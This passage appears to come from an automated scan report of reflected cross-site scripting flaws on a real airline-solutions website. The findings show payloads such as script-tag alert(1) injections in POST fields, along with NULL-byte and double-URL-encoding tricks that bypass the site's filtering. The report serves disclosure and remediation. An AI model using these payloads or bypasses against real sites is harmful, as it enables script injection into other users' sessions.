Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316598; expires=Wed, 05-Oct-2011 17:09:58 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:10:13 GMT
Pragma: no-cache
Content-Length: 7106
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/about/copyright_and_trademark/?%007b237"><a>8a1a1739deb=1">
...[SNIP]...

3.4. http://www.sabreairlinesolutions.com/home/about/executive_team/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/executive_team/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d1445"><a>c4609654fa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1445"><a>c4609654fa0 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/about/executive_team/?%00d1445"><a>c4609654fa0=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_activity=1286313086; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:48:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286318891; expires=Wed, 05-Oct-2011 17:48:11 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fabout%2Fexecutive_team%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:48:21 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8501


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/about/executive_team/?%00d1445"><a>c4609654fa0=1">
...[SNIP]...

3.5. http://www.sabreairlinesolutions.com/home/about/executive_team/stephen_m._clampett [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/executive_team/stephen_m._clampett

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd77e%2522%253e%253ca%253e0808e0e2c85 was submitted in the REST URL parameter 4. This input was echoed as bd77e"><a>0808e0e2c85 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /home/about/executive_team/stephen_m._clampettbd77e%2522%253e%253ca%253e0808e0e2c85 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321284; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:28:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321284; expires=Thu, 06-Oct-2011 01:28:07 GMT; path=/
Set-Cookie: exp_last_activity=1286346487; expires=Thu, 06-Oct-2011 01:28:07 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 01:28:14 GMT
Pragma: no-cache
Content-Length: 6368
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<body id="stephen_m._clampettbd77e"><a>0808e0e2c85">
...[SNIP]...

3.6. http://www.sabreairlinesolutions.com/home/about/media_press/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/media_press/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0049524"><a>16b0673047b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 49524"><a>16b0673047b in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/about/media_press/?%0049524"><a>16b0673047b=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_activity=1286313086; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:49:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286318943; expires=Wed, 05-Oct-2011 17:49:04 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:49:12 GMT
Pragma: no-cache
Content-Length: 6981
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/about/media_press/?%0049524"><a>16b0673047b=1">
...[SNIP]...

3.7. http://www.sabreairlinesolutions.com/home/about/privacy_policy/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/privacy_policy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00eb01d"><a>04cb2f1cd5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb01d"><a>04cb2f1cd5a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/about/privacy_policy/?%00eb01d"><a>04cb2f1cd5a=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:00:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316031; expires=Wed, 05-Oct-2011 17:00:32 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:00:57 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13642


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/about/privacy_policy/?%00eb01d"><a>04cb2f1cd5a=1">
...[SNIP]...

3.8. http://www.sabreairlinesolutions.com/home/about/sitemap/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/sitemap/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0080478"><a>1c4558ae88c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80478"><a>1c4558ae88c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/about/sitemap/?%0080478"><a>1c4558ae88c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:02:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316171; expires=Wed, 05-Oct-2011 17:02:51 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fabout%2Fsitemap%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:03:17 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/about/sitemap/?%0080478"><a>1c4558ae88c=1">
...[SNIP]...

3.9. http://www.sabreairlinesolutions.com/home/about/the_as_advantage/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/the_as_advantage/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b4ab8"><a>1b259e8819c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4ab8"><a>1b259e8819c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/about/the_as_advantage/?%00b4ab8"><a>1b259e8819c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_activity=1286313086; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:44:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286318660; expires=Wed, 05-Oct-2011 17:44:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:44:34 GMT
Pragma: no-cache
Content-Length: 7853
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/about/the_as_advantage/?%00b4ab8"><a>1b259e8819c=1">
...[SNIP]...

3.10. http://www.sabreairlinesolutions.com/home/ascend [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c967d"><a>94f7e2076ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c967d"><a>94f7e2076ed in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend?%00c967d"><a>94f7e2076ed=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:05:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316325; expires=Wed, 05-Oct-2011 17:05:25 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:05:38 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19162


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend?%00c967d"><a>94f7e2076ed=1">
...[SNIP]...

3.11. http://www.sabreairlinesolutions.com/home/ascend [search_term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend

Issue detail

The value of the search_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eff5"><script>alert(1)</script>609319ef91e was submitted in the search_term parameter. This input was echoed as 3eff5\"><script>alert(1)</script>609319ef91e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /home/ascend HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.sabreairlinesolutions.com/home/ascend
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sabreairlinesolutions.com
Pragma: no-cache
Cookie: exp_last_visit=1286313086; exp_last_activity=1286323079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; __utmb=178985382.2.10.1286304597; __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utmc=178985382
Content-Length: 28

sort_term=issue&search_term=3eff5"><script>alert(1)</script>609319ef91e

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 22:58:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323079; expires=Wed, 05-Oct-2011 22:58:02 GMT; path=/
Set-Cookie: exp_last_activity=1286337482; expires=Wed, 05-Oct-2011 22:58:02 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 22:58:03 GMT
Pragma: no-cache
Content-Length: 7974
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="text" name="search_term" id="search_term" value="3eff5\"><script>alert(1)</script>609319ef91e" />
...[SNIP]...

3.12. http://www.sabreairlinesolutions.com/home/ascend [sort_term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend

Issue detail

The value of the sort_term request parameter is copied into the HTML document as plain text between tags. The payload 81919<script>alert(1)</script>0c53ea14b3b was submitted in the sort_term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /home/ascend HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.sabreairlinesolutions.com/home/ascend
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sabreairlinesolutions.com
Pragma: no-cache
Cookie: exp_last_visit=1286313086; exp_last_activity=1286323079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; __utmb=178985382.2.10.1286304597; __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utmc=178985382
Content-Length: 28

sort_term=issue81919<script>alert(1)</script>0c53ea14b3b&search_term=

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 22:57:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323079; expires=Wed, 05-Oct-2011 22:57:19 GMT; path=/
Set-Cookie: exp_last_activity=1286337439; expires=Wed, 05-Oct-2011 22:57:19 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 22:57:20 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<h3>Issue81919<script>alert(1)</script>0c53ea14b3b</h3>
...[SNIP]...

3.13. http://www.sabreairlinesolutions.com/home/ascend/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b1c03"><a>05b671b0eb5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1c03"><a>05b671b0eb5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/?%00b1c03"><a>05b671b0eb5=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321370; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:31:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321370; expires=Thu, 06-Oct-2011 09:31:29 GMT; path=/
Set-Cookie: exp_last_activity=1286375489; expires=Thu, 06-Oct-2011 09:31:29 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:31:45 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19196


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/?%00b1c03"><a>05b671b0eb5=1">
...[SNIP]...

3.14. http://www.sabreairlinesolutions.com/home/ascend/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00fe06e<a>db887c7418b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe06e<a>db887c7418b in the application's response.

